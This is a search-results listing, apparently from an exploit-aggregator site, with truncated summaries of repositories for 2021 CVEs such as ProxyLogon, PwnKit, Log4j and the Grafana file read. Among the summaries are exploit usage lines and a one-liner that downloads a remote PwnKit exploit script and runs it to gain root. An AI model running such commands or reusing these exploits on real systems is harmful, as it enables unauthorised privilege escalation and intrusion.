109352 matches found
CVE-2021-22206
CVE-2021-22205...
ProxyLogon
ProxyLogon ProxyLogon is the formally generic name for CVE-2021-26855, a vulnerability on Microsoft Exchange Server that allows an attacker bypassing the authentication and impersonating as the admin. We have also chained this bug with another post-auth arbitrary-file-write vulnerability,...
Solr-SSRF
Solr-SSRF CVE-2021-27905 The repeat package in the Burp file contains specific steps for reproduction. The POC is a detection plugin for Xray...
CVE-2021-36934
CVE-2021-36934 CVE-2021-36934 PowerShell scripts Detection.ps1 This is a quick and dirty script to see if a machine may be vulnerable. It writes out a message to the shell indicating if BUILTIN\Users was detected in the permission list and includes the current permissions on the SAM path for...
CVE-2021-43798-Grafana-POC
CVE-2021-43798: Grafana Arbitrary File Read Vulnerability POC Usage: python3 exp.py IP:PORT...
MSHTMHell
MSHTMHell: Malicious document builder for CVE-2021-40444...
Log4j_Attacker_IPList
Log4jAttackerIPList CVE-2021-44228 Log4j Attacker Ip List.xlsx...
CVE-2021-21551
Exploit CVE-2021-21551 for LPE by creating System cmd Tested on Windows 11 21H2 22000.1335...
CVE-2021-26856
I have translated the chinese exploit at https://github.com/jsdryan/CVE-2021-26855 for english reader and people unfamiliar with golang just look at the png pictures...
PwnKit-Hunter
Background Last week, a significant vulnerability in polkit’s pkexec was publicly disclosed link. By exploiting this vulnerability, attackers on a vulnerable host could easily gain full root privileges from any unprivileged user. Following the public disclosure of this “PwnKit” vulnerability, we...
cve-2021-44228-log4j-test
cve-2021-44228-log4j-test Test 1. LDAP Server and Exploit File Download Server 1.1 Running Docker-compose docker-compose.yml root@kitploit: version: '2' services: dockerdj: image: openidentityplatform/opendj:latest containername: ldap environment: ROOTUSERDN: "cn=han" ROOTPASSWORD: "han" BASEDN:...
poc-cve-2021-4034
poc-cve-2021-4034 CVE-2021-4034 的 PoC,被称为 pwnkit 如何使用 只需运行 make make,然后检查 release 文件夹;或者如果你更喜欢一行命令 sh -c "$curl -sSL https://github.com/dzonerzy/poc-cve-2021-4034/releases/download/v0.2/run-exploit.sh" 享受 root@kitploit: dzonerzy@DESKTOP-5JHC90H:/mnt/c/Users/DZONERZY/GolangProjects/pkpwn$ ./exploi...
CVE-2021-4034
CVE-2021-4034 Local privilege escalation via pkexec Watch the ✨ YouTube Video...
frameworks_base_AOSP10_r33_CVE-2021-0688
此存储库没有 README。...
CVE-2021-44228
CVE-2021-44228 Professional Service scripts to aid in the identification of affected Java applications in TeamServer...
Microsoft-Exchange-RCE
Microsoft-Exchange-RCE Microsoft Exchange CVE-2021-26855&CVE-2021-27065...
RpcAuthnLevelPrivacyEnabled
Managing deployment of RPC printer association changes for CVE-2021-1678 KB4599464 Windows printer sharing error download and run: https://github.com/alvaciroliveira/RpcAuthnLevelPrivacyEnabled/blob/main/RpcAuthnLevelPrivacyEnabled.reg CREDITS TO:...
cve-2021-4034
cve-2021-4034 PoC for cve-2021-4034 Based on the PoC by https://haxx.in: https://haxx.in/files/blasty-vs-pkexec.c. Probably he's https://github.com/blasty?! I don't know. With a little help from https://github.com/daimoniac How to use? Compile cve-2021-4034.c root@kitploit: gcc -Wall...